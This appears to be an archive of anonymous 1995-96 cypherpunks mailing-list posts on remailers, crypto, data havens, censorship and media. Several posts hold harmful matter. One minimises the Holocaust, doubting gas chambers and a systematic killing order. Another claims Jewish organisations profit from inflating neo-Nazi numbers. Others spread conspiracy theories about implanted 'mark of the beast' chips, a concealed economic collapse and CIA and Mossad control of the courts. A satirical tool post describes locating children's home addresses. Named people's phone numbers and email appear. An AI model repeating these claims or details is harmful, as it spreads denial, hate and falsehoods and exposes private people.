Now, this new vision doesn't portend poverty for the
media masters. There's still a place for movie studios,
television producers and music publishers -- the Disneys
of the world -- in this new, content-driven universe. The
phone companies will provide Internet access to the
masses. And the couch-potato style of television will
probably always be with us.
But it won't be business as usual for the media masters.
It's entirely possible that beginning novelists,
musicians and even film makers will choose to distribute
through the Web. And it's almost inevitable that one day
soon, a John Grisham, an R.E.M. or a Roseanne will grasp
the advantages of ditching the media company and selling
directly to the consumer.
A year ago, people were buzzing about the proposed (and
eventually aborted) marriage of Bell Atlantic and T.C.I.
Now people are talking about Disney and Cap Cities, CBS
and Westinghouse, and Ted Turner and some other
television network. But if the World Wide Web shatters
the current paradigm of distribution, the channel
capabilities of cable systems and even networks will be
severely devalued. Anyone will be able to set up a new
channel or storefront on the virtual highway, for free,
asking permission of no one and accepting income directly
over the wire.
This is why John Perry Barlow, co-founder of the
Electronic Frontier Foundation, calls the current vave of
media realliances "the rearrangement of deck chairs on
the Titanic."
The iceberg, of course, is the Internet.
Steven Levy is a columnist for Newsweek. His last article
for the New York Times Magazine was "The Unabomber and
David Gelernter."

@_date: 1995-09-28 21:39:53
@_author: Anonymous 
@_subject: No Subject 
Is it just me, or does someone need to be humbled?
STTbruter anyone?

@_date: 1995-09-29 15:40:21
@_author: Anonymous 
@_subject: Call for IT Sec XX 
Call for White Papers
     Information Technology Security Policy Setting Process
                          issued by the
                   Cross-Industry Working Team
                  Thursday, September 28, 1995
The Cross-Industry Working Team (XIWT) is seeking inputs from industry on ways to improve the process by which public policy information technology  systems security is developed. At the
invitation of the Information Infrastructure Task Force (IITF) the U.S. government, XIWT is soliciting ideas broadly from US
industry, in the form of White Papers that address this issue. will, later this year, convene a workshop of industry experts organize the ideas and suggestions expressed in these White into a report for use by the IITF, and will prepare a report to made available to the public.
XIWT is a multi-industry coalition of organizations committed defining the architecture and key technical requirements for a
powerful and sustainable national information infrastructure XIWT aims to foster the understanding, development and of technologies that cross industry boundaries; facilitate the
conversion of the NII vision into real-world implementations, facilitate a dialogue among representatives of stakeholders in private and public sector. Additional information about XIWT can be
found on the Internet at: Information Technology Systems Security
In the developing National Information Infrastructure (NII),
information technology will be deployed in a wide range of and systems including communications, computing, software and many different types of applications. The ability of this
technology, and the systems which employ it, to provide the
requisite levels of security and protection, are of concern to
almost everyone.
Issues of central concern include: physical protection of and their contents, potential vulnerabilities at various points
within the networked environments of these systems, and the to provide or even guarantee reliable and/or uninterruptable
service. The infrastructure for such capabilities will need to
include mechanisms for the protection of networks, computers other types of equipment as well as systems that employ these
elements, as well as methods for analysis, certification and
validation of technology and systems, and for facilitating the
setting of standards. It is likely that cryptographic will need to be available throughout for possible use in and authentication of information. Issues involving the of  these capabilities will need to be uncovered, discussed and
resolved where possible. At present, the federal government has formal process in place, in the Congress or in Executive Branch
agencies, which adequately involves the private sector in the
determination of public policy in this area.
Responsibilities for this broad area within the federal are widely diffused and do not necessarily insure that all the
relevant concerns of the private sector are taken into account.
Further, no single process is used by the various parts of the
federal government and a variety of policies, reflected in regulation and practice, usually result. A methodology is by which private sector interests can be adequately expressed factored into resulting policies. The purpose of this call for
white papers is to request written inputs from interested and
knowledgable parties on how the formal process to developing
information technology systems security policies may be and particularly on how private sector inputs can be most
effectively incorporated.
Specifically, industry is requested to identify those areas,
domains, and issues that are especially relevant for and to recommend specific suggestions or approaches by which policy determination process in these areas may be improved. may entail, for example,  the establishment of one or more dedicated to this purpose, within or across domains; the of a broad set of principles for the government or other bodies employ; the setting of national goals or other specific
recommendations for federal action.
White papers are specifically solicited from U.S. industry; individuals who wish to contribute are welcome to do so.
Submissions may be made on paper or electronically by sending
electronic mail, document files, or via a form located on the World Wide Web server (addresses below). Submissions made on of companies will be taken to represent the views of the firm;
these will be verified if it is not made clear in the that the document represents a company position. Individual
submissions will not be verified if they do not claim to company positions.
Submissions should be: 1) responsive to the primary goal of call, (focused specifically on process improvement and not the
presentation of  view on policy deficiencies or on desired
policies); 2) clear in terms of specific topics, areas or of policy; 3) reasonably direct, brief and timely.
Any format may be used for the white paper, and it may be of length. However, submissions must include the following
information, on envelopes or headers to email and web messages, on the submission document, whatever its form:
1.   The name of individual making the submission;
2.   The name of firm on whose behalf the submission is made;
3.   The return address by which submission may be verified, if
     necessary.
XIWT will convene a one or two day  invitational workshop in Washington DC area in December, 1995, to review submissions and
organize the preparation of findings. Papers received by 15, 1995, will be used in the workshop.  The report of this is intended to be made available in February, 1996.
Submissions must be made to one of the following addresses:
Conventional Mail:
     Security Policy Process
     XIWT
     1895 Preston White Drive
     Suite 100
     Reston VA 22091-0913
Electronic Mail:
     secpros at cnri.reston.va.us
Please place: "Security Policy Process" in the "Subject:" Please use ASCII text in any attachments.
World Wide Web: suggestions may be contributed via the internet at: The content of submissions will be used by XIWT only for the
purposes described in this call. No specific attribution to
individual companies or individuals will be made in the findings or
report. We look forward to your help in this important national
For additional information, please contact Charles Brownstein Pam Memmott Tel:  (703) 620-8990
Internet: cbrownst at cnri.reston.va.us
Internet: pmemmott at cnri.reston.va.us
9/22/95; PJM

@_date: 1996-04-05 20:44:08
@_author: Anonymous 
@_subject: Fascinating troll with forged newgroups 
The latter is most likely the truth given that Bnai Brith and the ADL
and the Simon Wiesenthal centre all have plenty to gain financially
by claiming that the internet is full of neo-nazis.

@_date: 1996-04-10 18:38:51
@_author: Name Withheld by Request 
@_subject: onyma 
The term `nym' is erroneus: The Greek words are an-onym, pseud-onym,
syn-onym, hom-onym pp, derived from `onyma', name.

@_date: 1996-04-17 02:20:47
@_author: Anonymous 
@_subject: TIME Daily: Policing China's Firewall 
Policing China's Firewall
BEIJING: The Chinese government is requiring all Internet users and
companies marketing Internet services to register with the police.
Mailed warnings from the Beijing Police Public Security Bureau
announce all individuals using the Internet must register with a
special police section of Computer Security Supervision, and include
their email addresses, presumably for monitoring purposes. The rules,
which are taking effect as these notices surface, require each Chinese
registering to sign a pledge agreeing to abide by Chinese law and
respect state security. Users are also required to pay a 400 yuan
(about $50) registration fee, and pay 100 yuan a month for six hours
nline time. The fee, close to a month's salary many urban Chinese,
could stop many from logging on. The country's some 100,000 Internet
users are already barred from newsgroups containing 'undesirable'
material such as government human rights violations and pornography.
"This is the latest move to try to control the Internet," says TIME's
Beijing Bureau Chief, Jaime Florcruz. "It dawned on the Chinese
government that new ideas from overseas were leaking into the psyche
of the Chinese people. It's still unclear how they will block the flow
 of information, especially when the government has such need for it,
itself. Its a losing battle, especially in the provinces. If the Party
cadres there want Internet access, or satellite TV, Beijing will have
a hard time curbing them."

@_date: 1996-04-18 17:14:15
@_author: Anonymous 
@_subject: GNU Version 0.01 (alpha) of KiddieFind is now available 
I am going ahead and releasing an alpha version of KiddieFind a free
Unix implementation of LolitaWatch.  Everything is under the GPL, so
the source code is free, hack on it all you want ...
KiddieFind is an enhanced free version of Nubility Inc.'s LolitaWatch
for Unix.  It works by locating network packets that have the US
federally mandated Under18 bit set, and then uses publicly accessible
databases to map them into a street address and phonenumber.
The networked version works as follows, using the provided plug in
module (a version is provided in 0.01 for AOL, I'm working on a
CompuServe version and will have it ready in a week or so) to connect
to a major online service.  Once connected it goes into the equivalent
of promiscuous mode and scans all traffic for the age bit, and
forwards the information back to your system.
After collecting all this information, it scans a number of publicly
accessible databases to turn the information into a street address.
The geographical location can be approximated by running a traceroute
on the IP address of the originating packet and works backwards until
a host with reliable geographic data can be located.  KiddieFind only
requires state-wide granularity, and this only to narrow the later
phonebook search.
Once a geographic location has been determined, it's not likely that
the child has her own phone.  Therefore the parents must be found.  A
search is done through the any number of the available on-line
telephone books.  By this stage KiddieFind should have a manageable
number of candidate numbers.  If real names are being used, than it's
easy to isolate the correct phone number.  Hopefully the Denning
geographic information will be mandated soon, thus eliminating nearly
all sources of error isolating the correct neighborhood.
If there are still too many candiate numbers a number of other mostly
automated searches can be done.  The parents' home web pages can be
searched for personal information, etc.
Once you have the system tuned, all you merely have to do to locate a
street address and phone number for any number of children is just
login and poke around a bit.  Everything else is done in the
background.  You don't even have to think about it.
I've obtained the address and phone numbers of over 5,000 children so
far, but I expect this will become easier after all the kinks in the
system are worked out.
GNU archives are located throughout the world, pick the one closest to
you for downloading.

@_date: 1996-04-24 07:55:52
@_author: Anonymous 
@_subject: Nazis on the Net 
Was Dresden also right? (more died than at Hiroshima)  The firebombing
of Tokyo? (10% died in one raid).  Stalins execution of his own people?
Look at facts, not propoganda, before coming to such conclusions.
The conventions of war (namely the aim of keeping civilians out of it,
along with good treatment of prisoners) evolved over many centuries,
but then come the Brits and the Yanks to destroy it all with their
indiscriminate bombing of civilians, using the "they can stop the
torture simply by surrendering," and "those bombs saved countless
[American/British] lives!" excuses, and directing attention away from
their own attrocities by spreading propoganda such as soap made from
Jews.  Then to direct attention away from themselves even further, the
victors judge the defeated at Nuremburg for "war crimes," when the
accusors themselves were guilty of terror bombing, the worst war crime
of them all.
Does anybody really claim it did not happen?  I doubt it.
I assert that those who express doubt over details of the current
story (such as the numbers that died in the camps, the existence of
gas chambers, or whether Hitler gave an order to systematically kill
Jews) are referred to by the media as saying that the Holocaust didn't
happen, but that is *not* what they are saying.  With regard to your
grandfather being liar, that is hard to say without knowing precisly
he has said, but if he states that, eg, Dachau was a terrible place,
riddled with disease and starvation and terrible conditions, and
hundreds of thousands of people died, then who would disagree with him?
If on the other hand he asserts that he saw gassed Jews at Dachau,
then he is mistaken (although not necessarally a liar.)
The Nuremberg Trials...had been popular throughout the world and
particularly in the United States.  Equally popular was the sentence
already announced by the high tribunal: death.  But what kind of trial was
this?  ...The Constitution was not a collection of loosely given political
promises subject to broad interpretation.  It was not a list of pleasing
platitudes to be set lightly aside when expediency required it.  It was
the foundation of the American system of law and justice and [Robert Taft]
was repelled by the picture of his country discarding those Constitutional
precepts in order to punish a vanquished enemy.
                U.S. President, John F. Kennedy

@_date: 1996-04-24 14:25:22
@_author: Anonymous 
@_subject: Cashless Society and the Coming Collapse 
The Cashless Society
The October 31 issue of Information Week featured an article on the
October 13 acquisition of Intuit Inc. by Microsoft Corporation for 1.5
billion dollars. Their vision is to create a world where all financial
transaction are performed electronically. "Microsoft's vision of the
future is clearly a world in which the majority of consumer and
business transactions will take place online". Other companies are also
rushing to enter the electronic transaction market place. Soon, there
will simply be no need for cash, everything will be done on line.
Automatic debits and credits from your bank and credit accounts will be
performed in a few milliseconds. You will be able to purchase nearly
anything in the world from your home via the electronic transaction.
(Since the original writing of this article, Microsoft did not receive
approval to make this merger with Intuit. However, the vision of
Microsoft stays the same).
America is already now seeing a widespread use of the "intelligent"
smart cards. These cards are being used for telecommunications, medical
information purchases, identification, and more. Western Union now
offers a smartcard that you can purchase to make long distance
telephone calls. The military has been issuing smartcards for some time
now to all of it's personnel. California is issuing smartcards to all
recipients of state benefits, including Social Security and welfare
benefits. The federal government is considering plans to implement a
smartcard for it's 3.1 million members for payroll purposes.
This proliferation of smartcards has not been without it's perceived
benefits. However, this new technology has created another problem,
namely security. The security offered by the smartcard is not
sufficient. Fraud, theft and abuse of smartcard technology has prompted
for many officials to call for a more secure and personal means of
transactions. A single card, useable anywhere in the world is being
considered. But even this presents problems with the issue of security
and privacy.
An improvement on smartcard technology is now being formulated. For
several years, microchips have been tested in animals to learn their
effects, efficiencies and drawbacks. This technology is now perfected
for use in humans. Instead of carrying several different types of
smartcards, credit cards and identification, we are soon to be offered
a single implanted chip that can contain information about us that
anybody ever needs to know.
Not until the last few years, has technology advance to the point where
implantation of a microchip was possible within human flesh. This is a
fulfillment of prophecy, for the Bible says "And he causeth all, both
small and great, rich and poor, free and bond, to receive a mark in
their right hand, or in their forehead" (Rev. 13:16).
Only very recently has technology made it possible to make such a mark
in human flesh. With the widespread usage of computers and databases,
tracking individuals and every financial transaction has now become a
These tiny chips are already being produced by the millions and
millions today for a variety of electronic devices, including
smartcards. We are on the verge of having these chips implanted in
every human being. Are you prepared to take your mark?
The Coming Collapse
Another deceptive lie being propagated by the government and the media
is our economy. The rate of unemployed workers in this country is being
reported to us at only 3%. However, many private sources of information
have this number much higher, closer to 9-10%. Some goes so far as to
say unemployement is really 20%! Our government cannot afford the bad
publicity of a recession. Statistics prove that nearly every major
corporation has been downsizing staff by the thousands and thousands.
Nearly 1 million positions have been abolished since the first of the
year. Yet in the face of all this, our government continues to tell us
that our economy is booming.
Our federal deficit is also much higher then is being commonly
reported. Deficit spending under President Clinton is at an all time
Simply put, our nation cannot afford to continue on it's present course
of overspending. In a report presented to President Reagan, a
commission of 31 Congressmen stated that the United States would
experience a financial collapse by the year 2012. Some forecasted that
this coming collapse would happen by the year 2005.
Consumer debt in America is the highest consumer debt in the history of
the world, bar none. Many Americans live off of credit cards, always
getting deeper and deeper into debt. The media portrays a fictitious
world where we can "afford" anything. And if we don't want to "buy,
buy, buy", then we are somehow dysfunctional or inadequate.
The average American family has to work two jobs just to make ends
meet. While our purchasing power continues to decline for every dollar
we earn, there's always something new to buy. We are beset by self
centeredness, self grandizement and narcissistic "needs". In a never
ending downward spiral, we chase the holy grail of material wealth,
urged on by the prophets of the press.
Financial ruin, broken families, despair, hopelessness and stress
related disease are often the end results. Thousands turn to alternate
realities, including drugs, alcohol, adulterous relationships and other
means of "release" from these financial pressures.
America has been teetering on the brink of a financial disaster,
unparalleled in human history. Efforts to avoid this collapse include
the establishment of a new monetary system, including the issuing of
new money. Currently, entire caravans of this newly minted money are
being distributed around the country. A national and international
recall of $100 dollar bills was proposed by Senators Patrick Leahy and
John Kerry. This recall may quite possibly trigger the greatest
financial collapse the world has ever seen. This financial collapse
could be triggered overnight when mass panic, fear and distrust in the
new monetary system becomes widespread.

@_date: 1996-04-24 15:14:01
@_author: Anonymous 
@_subject: The Iron Mountain Report 
Some years ago the federal government set up a special [inaudible] group. For two-and-a-half years they met in secret at Iron Mountain, New York. Their findings were called "Report from Iron Mountain on the Possibility and Desirability of Peace." Their document, by some of the leading thinkers, was suppressed. Later, it was printed in a limited edition, with the *names* removed. Some were shocked by what they read.
Throughout history, permanent peace was dangerous to established governments. War, and the threat of war, are the principal organizing force for most societies. They divert attention from *other* economic and political problems. War keeps the factories going, wasting government manpower and material that would otherwise be of surplus. Peace brings unemployment, the collapse of prices of goods and property, and knocks down the government. In simple terms, war prevents [economic] depression. (By the way, sooner or later, whatever nation loses a war is overthrown. So it has been all the centuries. The American ruling circles lost the Vietnam War. The aftermath is bound to scatter the rulers to the As the report says, in Europe, over the years, the typical standing army consisted of troops unfit for employment in commerce, industry or agriculture, led by officers unfit to practice any legitimate profession or to conduct a business enterprise. A large standing army is a form of social welfare program; a form of control of the population. War, and the threat of war, keep all levels of society busy. The newspapers are kept rich reporting it. Pundits are employed to mouth off. Wars speed up so-called scientific development. War goods do not have to show a profit or be the lowest price. In permanent peace there are vast cutbacks in research and development. And yes, wars kill off surplus population; young men with no good job waiting for The [Iron Mountain] report points out that the war system makes stable government of society possible. The end of war means the end of national sovereignty.
Without an identified enemy, why would the CIA have a large secret budget to assassinate political leaders and overthrow other governments the White House does not like?
To promote their secret agenda, the CIA has taken over a part of the savings and loan system to funnel men and money for "dirty tricks" here and overseas.
The CIA likewise manipulates the federal bankruptcy courts to grab up companies for use as covert action fronts. In Chicago, this is done with the help of foreign intelligence agencies, such as Mossad. Chicago bankruptcy trustee William A. Brand (sp?) jr. is a top honcho of the CIA and other spy shops.
In the name of national security, the mass media have been *ordered* to "soft pedal" or "stay shut" about spy agencies doing such things. The CIA involvement in bankruptcy court should have made headlines as the number one item on the evening TV news. Yet not one word is said by the liars and whores of the press.
Play it again: Fermilab and weather modification. (312) 731-1505.
New message Monday; we change it several times a week. Donations appreciated. Citizens' Committee to Clean Up the Courts, 9800 S. Oglesby (sp?), Chicago, 60617.
For the latest on courts, banks, espionage agencies, political assassinations and the news media. On 24 hours.

@_date: 1996-04-25 06:08:06
@_author: Anonymous 
@_subject: [NOISE] Re: Nazis on the Net 
Do we have a neo-Nazi in this discussion??  Are you implying that any sceptic
of a few Holocaust `facts' is a neo-Nazi??  Do you infer that all pro-lifers
are Republicans??
It is because of such baseless inferences, I have to remain anonymous.  I would
dearly love to debate under my real name, but am prevented from doing so by the
neo-Nazi name-calling.
Yes you are correct, I disagree that Abraham Lincoln was better than those in
the South, not for racial reasons (remember, the Civil War was *not* about
slavery, because the slavery issue only arised *after* the war started), but
because I believe that a diverse set of countries is `better' than one.  I
believe that countries that want independence (such as Chechnya) should have
it.  (Yes, I am likening Abe Lincoln to Boris Yeltsin).
[ You may also like to consider that blacks as well as whites fought for the
South. ]
``The believer is happy. The doubter is wise''.  -  Hungarian proverb

@_date: 1996-04-29 21:17:13
@_author: Anonymous 
@_subject: Get your I/CODE today 
don't let you choose a nice string like "cypherpunk" to login with.
The cypherpunks I/PRO code is:

@_date: 1996-04-30 14:55:30
@_author: Anonymous 
@_subject: No Subject 
"I am sorry if you misunderstood my previous email. We are ex-Stanford
grad, not current students! The WhoWhere? database is collected through
a combination of technolofy, partnerships, and self-registrations by
Our content is from publicly available sources."
         name: Doremieux, Francois Yves Jean
       e-mail: 96francoid at Gsb
   department: Business
         year: Graduate
        phone: (415) 497-4334

@_date: 1996-08-02 07:32:54
@_author: Anonymous 
@_subject: Is 1024-bit PGP key enough? 
Is security provided by 1024-bit PGP key sufficient against most powerful
computers that are available today? Say if smoe organization spent 10
billions of dollars on a cracking machine, would it be possible to crack the keys in reasonable time?

@_date: 1996-08-07 21:31:11
@_author: Anonymous 
@_subject: Corporate e-mail policy 
I used to work for a company which had a surprisingly liberal policy about e-mail.The gist of it was:
    "Private e-mail will not be read by anyone other than the recipient. The
    only exceptions to this are:
        1) Systems personnel may examine mail messages to determine if the mail
           system is working correctly; [e.g., checking mail logs against users'
           mailbox contents to verify delivery]
        2) [basically said e-mail would be treated like any other system files
           in the event of a criminal investigation, etc.]"
The policy specifically required authorization from the line VP for either of these actions, and reinforced that the systems people were to treat the e-mail as administratively confidential data.
The only time I heard of anyone even asking for e-mail was when a project manager wanted a copy of a message that a sponsor sent to one of his subordinates, who was on vacation. The systems folks cited the policy, the line VP backed them up, and the manager went away empty-handed. (He wound up calling the subordinate at her hotel and browbeating her into authorizing the computer center folks to forward a copy of the message to the manager. But that's another story.)

@_date: 1996-08-09 05:13:31
@_author: Anonymous 
@_subject: Thank you. 
I forgot the name of the person who wrote the patches
to the Linux kernel for stego.
They work perfectly, and I had no problems setting it up.
Many thanks.

@_date: 1996-08-11 03:08:52
@_author: Anonymous 
@_subject: testAnguilla Censors taxBomber ..... ?? 
As of immediately, the "taxBomber's Site & Internet Offshore Center"
has been pulled by our Anguilla provider and will remain inaccessible
for a few days.
This is the work of some journalist hacks who did a major job of
character assassination by claiming that we (and our provider)
were involved in selling fake passports.
This tactics isn't exactly new or particularly original:
The Argentine press pulled a similar stunt in April, and again our
provider was pressurized to cut us off from the Web without
Needless to say, we have NEVER EVER dealt in one single fake
passport, nor have we ever offered, sold or brokered any forged,
stolen or "lost" documents. Nor is there any need to do so, if you can
get the real thing absolutely legally.
But of course, this is a political rather than a legal issue - we
were, and still are, too successful for Big Brother's liking: on our
site, ordinary people (i.e. no govt. or intelligence agency personnel)
got loads of free information on *legally* saving taxes, protecting
their assets and reffectivel guarding their privacy. While we were
and still are a commercial operation, we always made a point of being
as educative and topically exhaustive as our resources would permit.
But now, it seems, little Anguilla is getting "worried about its
international reputation".
Well, they are right, though with a vengeance: the reputation they
have most certainly lost as of today is that being of one of the
world's last truly liberal tax and data havens ...
Now for the good news: we will set up a provisional site elsewhere
soon and will announce it here on Usenet.
Still - if anyone knows of an operational site provider *outside* US
and EU jurisdiction, please drop us a line.  Your support would be
greatly appreciated and full credits given, if you so wish.
We will probably either set up a worldwide network of fallback and
mirror sites or continue our work in a new, truly innovative way to
effectively counter any censorship and dependency on site providers.
Until then, you can (still) email us at:
pt at taxbomber.com
or post your request (users permitting) to "alt.privacy",
which we will be scanning regularly.
Sorry for the inconvenience - hope to see you again soon!
the taxBomber

@_date: 1996-08-11 08:06:28
@_author: Anonymous 
@_subject: Police prepare stunning end for high-speed car chases 
Why don't they just have government access to car engines?  They could
just require car manufacturers to include remote shutdown devices for
the engines.

@_date: 1996-08-13 13:43:50
@_author: Anonymous 
@_subject: cybergangs 
Dimitri Vulis ranted thusly into the aether:
Jeez, is there no place safe from Dimitri's Cabal rantings? There Is No Cabal
fnord. So there.
ObCypherpunks: It's worth noting that Dimitri's reputation capital is so devalued on Usenet that his vote wasn't accepted in the recent soc.religion.paganism CFV:
dlv at bwalk.dm.com                                             Dr. Dimitri Vulis
   ! Vote rejected by votetaker (untrusted site)
This is from Message-ID: <839564931.8926 at uunet.uu.net>, btw.

@_date: 1996-08-14 15:38:57
@_author: Anonymous 
@_subject: [NOISE] Statists get to make choices, too. 
Oh, sure there is. The Misguided Cabal Dupes [tm] have decided they prefer
the relative order of the current system to the chaos of a disbarred
lawyer's vision. News admins have simply taken extra steps to make sure
that their services won't be disrupted by a few individuals who style
themselves the "Usenet Freedom Knights." I'm sure the Fucking Statists have
taken similar steps.
Your right to rant doesn't override my right to ignore you. Isn't that
really what this country's supposed to be about? The right to be left

@_date: 1996-08-16 06:23:05
@_author: Anonymous 
@_subject: remailers/kiddie porn 
Internet Child Porn An Issue At Stockholm Congress
STOCKHOLM - Distribution of child pornography on the Internet seems destined to top the issues at the world's first conference against sexual exploitation of
children opening later this month in Stockholm. Activists are trying to devise ways of keeping pedophiles from peddling such material on the global computer network, which is already used as a billboard to
advertise prostitution and sex tourism and to exchange adult pornography. But not everyone agrees that regulating the Internet or its 20 million users worldwide is the right move. Some advocates say the Internet represents free speech. Others argue that the distribution of child pornography on the Internet is not that widespread. Still, many see it as a problem. "The Internet is like heaven for the pedophile," said Toby Tyler, a United States police officer who lectures at the FBI Academy on child abuse. "As far as our ability to restrict the distribution of child pornography and stop the sexual exploitation of children on the Internet...it's not something that can be done."
Campaigners are concerned that unless urgent action is taken to stamp out the Internet's distribution of child porn, whether it features real children or just computer
generated images, it could spark greater demand for child pornography. "Neglecting to prohibit computer generated images could well re-establish the commercial trade -- filling bookstores with computer images, de-sensitizing society
and fueling demand for such material," said campaigner Margaret Healy from Bangkok-based End Child Prostitution in Asian Tourism (ECPAT). Tyler said the Internet has ended the days when pedophiles had to make costly cross-border runs to buy child pornography in countries where laws were laxer and
penalties lighter. Now they can obtain and distribute films and photos from their own homes on the Internet with little risk of capture. Tyler said the existence of anonymous re-mailers -- computer systems which accept material transmitted over computer lines and send it out again after coding its
original address -- concealed the source of pornography on the Internet. "Before on-line sex material was available, you'd to find someone to sell it to you, trade with you, or produce it yourself. The net provides a very high level of
safety." Short of denying people access to the network, he added, there was little to be done. Even convicted pedophiles with access to computers in prisons can get the
material. However computer experts agree the existence of just one re-mailing system in a country with more lax laws is enough for the global distribution of child
pornography on the Internet. Tyler said the most widely used re-mailing system currently operates from Finland, through which about 99 percent of all child pornography with untraceable
address codes passes. But Johan Helsingius, who runs a re-mailing system from Helsinki, said he did not think child pornography was a problem on the Internet or that any of the 10,000
messages which pass through his server daily contained child pornography. "To a large extent the net is self-regulating. As soon as you do something that offends enough people, measures will be taken by those who are involved with the
net," he said. ECPAT's Healy said in a report prepared for the five-day Stockholm conference that opens on August 27 that the regulation of child pornography on computers
presents special challenges and called on governments to fund better training. "The establishment of an international research organization with...specialists in the areas of investigation, law enforcement, behavioral science, prosecution, law and
computer technology could be an invaluable resource for the global community," Healy said. Copyright, Reuters Ltd. All rights reserved

@_date: 1996-08-17 15:19:07
@_author: Anonymous 
@_subject: No Subject 
Gee Phill, as I'm preparing to leave MS after 6 years, I have to disagree with you.  Mediocrity and bureaucracy have eatten away at a lot of the core of the company.  It is entirely marketing driven now, and the coders have definitely gone down hill since I first
started in Apps.  The "bozo" factor has steadily increased.  Only those new hires without a sense of history think it's a real cool place to work.  And, a few egocentric folks totally tripped on power and greed.  (Apologies to any MSofties on the list I don't
know personally.)
Talk to HR about the turnover of people with 5.5 to 8 years
under their belts who are bailing with their stock options because
it ain't a fun place to work anymore.  Testers, developers, UE,
you name it.
I can gripe because I was there.  I never seem to recall seeing
your name on any internal e-mail.
Oh yeah, this is coming through a remailer, because I'm reading
the list at work.  And I doubt BillG would appreciate my opinions
being sent out over MS resources.

@_date: 1996-08-18 18:36:34
@_author: Anonymous 
@_subject: Data_havens 
its location, is all in one place." Sure, with a satellite, both the data and the info required to access it is in the same physical location; it's a target as soon as someone tracks a transmission to its source.
systems, for a haven under the control of any single entity. Whether that control is implicit, such as the coercive force of the host governments, or the explicit policies of the owner, it will tend to force patterns in data storage. This could become problematic.
subject at DEF CON IV. I have to say that I'm a convert, now. Time to go forth and make the world safe for crypto-anarchy. Much of what I'm going to say is influenced by that talk. My only regret is that I didn't get his autograph. Enough about that...
network may lead to a dangerous concentration of information. If we are to assume that an attack on a data haven will involve the resources of large, unfriendly governments, along with the full legal (and extra-legal) powers of said governments...then it becomes possible to imagine a scenario where one's "network technique" is _studied_ in order to find possible caches for servers in the data-haven network.
becomes vulnerable to seizure. In friendly jurisdictions, subopenas and warrants may be issued. In unfriendly or extra-jurisdictional circumstances (e.g. space), one uses anti-satellite measures, black-bag jobs, bribes, or, heck, let's be paranoid and say they can send TEMPEST-equipped vans to sit outside and read the hard drives directly. Even if seizure is made impossible, enough heat can be brought to bear to limit the growth of one's haven_net and concentrate new nodes in certain specific jurisdictions...which of course become more attractive targets for seizure tactics.
what nodes are situated where. Not necessarily in the protocols, either. All those computers will need servicing, upgrading, network links, etc. etc. This requires some kind of a control and payment structure. Setting up a new node is particularly hazardous, especially after initial deployment. To make matters worse, once a node is found, it may leak information about the rest of the network (traffic analysis, anyone?). keeping a network map where it might be found in case of a search. Don't laugh. A good deal of design will need to go into a data haven; if the documents are not destroyed or secured in some way, they could bring down the whole system.
_different_ points for an adversary to bribe/steal/warrant his way onto a point in one's haven_net. Sure, maybe he can't get _all_ of them, but what can he do with the nodes he does have? Note that the haven operator may not necessarily know a jurisdiction or node has been compromised; how many times have you detected the NSA reading your personal e-mail? (on second thought, don't answer that question :)
_individuals_ or small groups in a sort of Godwin-esque federation for a robust, reliable, and unkillable haven_net. This implies a certain degree of flux on the part of the network; nodes have the right to secede at any time. The trick is to make it financially rewarding to be a part of the network, so the number of new nodes exceeds the number of imprisoned crypto-rebels/dilettantes/students looking for a buck/other former node-type people. and serves the stuff, is more of a coordinator or a broker than a warehouser. It acts as a front end to such a distributed system, and assumes the risk if the client's data should fall through the cracks. The added value over entering the system oneself comes from the technical assurance and insulation from legal risk. 	
[description of obtaining user ID and password thru anon remailers]
password to a specific number of nodes. Certainly it minimizes leakage of one's client list; certain nodes only serve a particular subset of clients. What happens if enough of the client's nodes are seized? Also, what about spoofing and lost identities? Sure, the protocols involved between haven and client may offer no chance of either, but what about the client's network? Just because they are paranoid enough to use a data-haven does not mean they are clueful enough to encrypt that modem link they may be using for SLIP, PPP, or whatever. to make the data retreivable simply by knowing its MD5 hash. No need for identies, no worrying about keeping a meta-secret or nym secret...just keeping or revealing the hash for file-by-file protection. accept for free (but charge a fee to downloaders). Each node can set its own prices in terms of e$/MB or other units (you like octets? megawords?) for a given amount of data. I'd like to accept "in-demand" data (Quake alpha, anyone?) on a 'consignment basis', but can't figure out how to ensure the node pays the original uploader w/o blowing away anonymity. Anyone got a paper lying around which could help (beg beg beg)?
be a major hassle. Not just from the State, either; how do you keep track of what money transfer came from which nym?   > built well. Becoming a new node should be an install-and-forget process. This requires certain features. Most importantly, the node's owner should not known, and should not be _able_ to know what exactly he or she is storing. I haven't looked at the new steg and crypto packages for linux, but that's about what I'm thinking of.
bother, when the whole point is to disappear it from physical space in the first place?? It simply allows Them to have a single point of attack.
of those 70 countries, you are in trouble. Even if the encryption is good, just looking at how much data is on the server, and from where, could be most unfortunate for business. There's a more serious concern in reliability, too; if one uses a data-splitting scheme, capturing enough servers has a probability of removing access to data.
That's bad for business.
thresholds would be good; losing one server wouldn't mean losing the data. It also forces Them to capture N servers instead of just one.
The system then relies upon the security of the locations of the servers. I am very skeptical of the idea that this can be acheived with a single "Universal Piracy Network" which is as popular and as prevalent as  is today. We need to make it easy, simple, profitable, and most of all, _FUN_. Getting people financially dependent on such a system wouldn't hurt, either.
I will be able to sell my disk space to the highest bidder, and know I am helping the cause of freedom and frictionless data.
A day where I can go forward and create value from "garbage" - unused cycles, unused HD space, underutilized graphics cards and coprocessors mouldering away in closets. Where people spontaneously join haven_nets because it's "cool", or "sensible", or any of the other justifications people make when they're jumping off the cliff with the other lemmings. When participation is a mouse-click away. When the NSA advises Congresscritters on how to best distribute their files, and spends most of its time figuring out cost/benefit analyses of the myriad haven_nets, and actively contributing its own latest, greatest, and "just unclassified" entry into the market for server software.
When no one will be able to imagine having a file without splitting it across half a dozen countries and half a hundred computers. Where it will be those who want un-encrypted data who are "strange" and "old fogies", because distributed data is _orthodox_, and the anonymity and e-cash is just a simple little feature, along with the rest, and hardly worth mentioning in and of itself. In short, no where. Utopia. But a nice vision to get wild-eyed and hand-waving about just the same.

@_date: 1996-08-23 16:36:01
@_author: Anonymous 
@_subject: Cypherpunks the movie 
why stop at a video why not a musical.... "Cypherpunk The Musical"  Broadway here we come...
Featuring Songs:
"PGP why is it so hard to break"
"We write code"
"Why were we called shitopunks?"

@_date: 1996-08-27 17:35:02
@_author: Anonymous 
@_subject: No Subject 
Used to have a whole pile of web accessable databases dealing with political corruption, crooked cops, government waste, and a database of alleged child molesters...  I beleive the site had to be shut down due to massive abuse, though.  The sponsor of the site was/is a guy named Tony Gatlin, his phone number was/is 615-859-3710. The company he worked for was/is called Self Test Software (selftestsoftware.com), but the company web page is defunct now as well. I'm guessing a massive libel suit
